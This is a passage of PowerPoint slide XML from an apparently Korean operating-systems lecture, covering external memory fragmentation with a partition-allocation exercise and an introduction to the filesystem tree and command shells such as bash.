                                <p:cTn id="56" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="77"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="78"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="8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6" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="29"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69" grpId="0" animBg="1"/>
      <p:bldP spid="73" grpId="0" animBg="1"/>
      <p:bldP spid="78"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그림 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EF70523-1C8E-490E-B220-5BA27D849632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="679730" y="1740804"/>
            <a:ext cx="5164727" cy="4861633"/>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4"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TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC30763D-B98D-40AE-A7B3-1CF9D7013417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293595" y="3505191"/>
            <a:ext cx="5354810" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>단편화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>남은 메모리가 연속적이지 않아서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>필요 메모리 보다 많은 공간이 남아 있지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>메모리에 올리지 못하는 공간 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>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116K + 96K + 6K + 56K = 274K </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="그룹 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A56EE57-781C-472A-94C3-0AD9C1A6E178}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5518768" y="1958272"/>
            <a:ext cx="2476163" cy="1076241"/>
            <a:chOff x="5518768" y="1958272"/>
            <a:chExt cx="2476163" cy="1076241"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2493DF-83CB-49E0-BC14-15025C68681C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6779779" y="2538973"/>
              <a:ext cx="1215152" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>Partition</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="원호 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6127621-48AD-4ED6-AA4A-75211D45B955}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5518768" y="1958272"/>
              <a:ext cx="421393" cy="1076241"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16281830"/>
                <a:gd name="adj2" fmla="val 5417363"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>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1" name="직선 연결선 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B83DDB-E4BC-4C7D-BDDC-BEC322937FBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:endCxn id="13" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940161" y="2311420"/>
              <a:ext cx="839618" cy="41221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9" name="그룹 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC73ADE-1377-4797-922C-27C4A8BBB900}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5365019" y="1610314"/>
            <a:ext cx="3406747" cy="701106"/>
            <a:chOff x="5365019" y="1610314"/>
            <a:chExt cx="3406747" cy="701106"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65071EAA-E3F8-41F9-B62D-9AE24382488A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7048163" y="1942088"/>
              <a:ext cx="1723603" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                <a:t>Main Memory</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="원호 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CA20E13-D7F1-4754-B153-31385524A83A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5365019" y="1610314"/>
              <a:ext cx="1683144" cy="677259"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 11011855"/>
                <a:gd name="adj2" fmla="val 0"/>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27" name="직사각형 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DD39238-2779-444F-98BA-B0CB650F4DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765371" y="3982064"/>
            <a:ext cx="1581320" cy="2015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5173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7" grpId="0" animBg="1"/>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214K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>나 쓰이지 못하다니</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메모리</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아깝다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프로세스를 잘 할당하면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번째 프로세스까지 할당할 수 있지 않을까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 순서를 바꾸어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프로세스 모두 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>할당하시오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kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   [ 40K, 100K, 160K, 250K, 200K, 120K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50" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Time Units Remaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>값은 충분히 큰 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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단편화 에 대해서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3479556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외부 단편화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해결할 수 있는 방법은 없을까</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26C2F365-5BD3-4C2A-9165-FF62572B7938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="461543" y="720191"/>
            <a:ext cx="5477949" cy="5120974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37142062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60253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a:t> File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The Tree Structure of the Filesystem (Unix Power Tools, 3rd ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624632DA-2FED-4F7F-85F1-88AE9DB0A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8539" y="1870982"/>
            <a:ext cx="5756440" cy="4015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198831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shell</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3D1E9414-0756-4010-ACA7-BE569AD9D50E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="24537" b="40395"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2801897"/>
            <a:ext cx="4670335" cy="1545520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FB5C3E7-EC95-4B3F-83F7-7DED17819784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2071562" y="4612460"/>
            <a:ext cx="1739787" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Window Shell</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4A52B0-E520-4AA2-9CB9-826F444F8280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7967283" y="5398513"/>
            <a:ext cx="2682374" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Linux Shell  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="쉘 스크립트 - 생활코딩">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F6E007-B725-4B13-AAB5-0DC4278B242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7773" b="50910"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6336525" y="2801897"/>
            <a:ext cx="5275031" cy="234080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7C89490-6639-48D9-BFA0-BB5594F1A181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554097" y="2163614"/>
            <a:ext cx="1421699" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>사용자 이름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="직선 화살표 연결선 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4670096-F28F-4541-9860-5BE5174D17FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="14" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6264947" y="2532946"/>
            <a:ext cx="297694" cy="2689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4D2F03E-41AA-4FF2-AFD9-60FBB3333BE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086385" y="2113424"/>
            <a:ext cx="1466896" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>호스트 이름</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="직선 화살표 연결선 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B437134-3D79-4CA1-A090-477780547125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7593717" y="2482756"/>
            <a:ext cx="226116" cy="3191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6F85DD48-41E0-4DE2-A118-EBF92D05E719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6336525" y="2801897"/>
            <a:ext cx="565925"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C461065F-0E7C-478C-8A93-D866434EC5CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6989018" y="2801897"/>
            <a:ext cx="1289133"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FF3D922A-F1DB-4859-BECA-BE8383C2490F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9730742" y="1778576"/>
            <a:ext cx="1001305" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>명령어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="직선 화살표 연결선 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59B1C83-7AD7-4A6A-8B75-EAC9059D53F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9171203" y="2147908"/>
            <a:ext cx="1060192" cy="6539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0CB1C488-116E-4FA3-BA88-F6589777747F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8581469" y="2810310"/>
            <a:ext cx="1179752"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26EB57EE-0BF3-469E-BCAF-B6C6C962EC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8553281" y="1978948"/>
            <a:ext cx="1207939" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>위치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="직사각형 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B985B0-100F-4D22-99F7-3B51EF8C6A1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384164" y="3208515"/>
            <a:ext cx="714116"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9" name="직선 화살표 연결선 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{603A3EA7-E851-4EAF-AD12-F21D186DBA5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="37" idx="2"/>
            <a:endCxn id="38" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8741222" y="2348280"/>
            <a:ext cx="416029" cy="8602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83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P spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="29" grpId="0" animBg="1"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="38"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>왜 쓸까</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30" name="Picture 6" descr="TmaxSoft - Better Technology, Better Tomorrow - 스토리 T">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BBA84FF-6648-4DF9-A4B7-71EA069AD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940" y="2242268"/>
            <a:ext cx="5880654" cy="377832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5F0E57-F862-4F75-8241-9A14E7F86023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261154" y="6130751"/>
            <a:ext cx="2902226" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
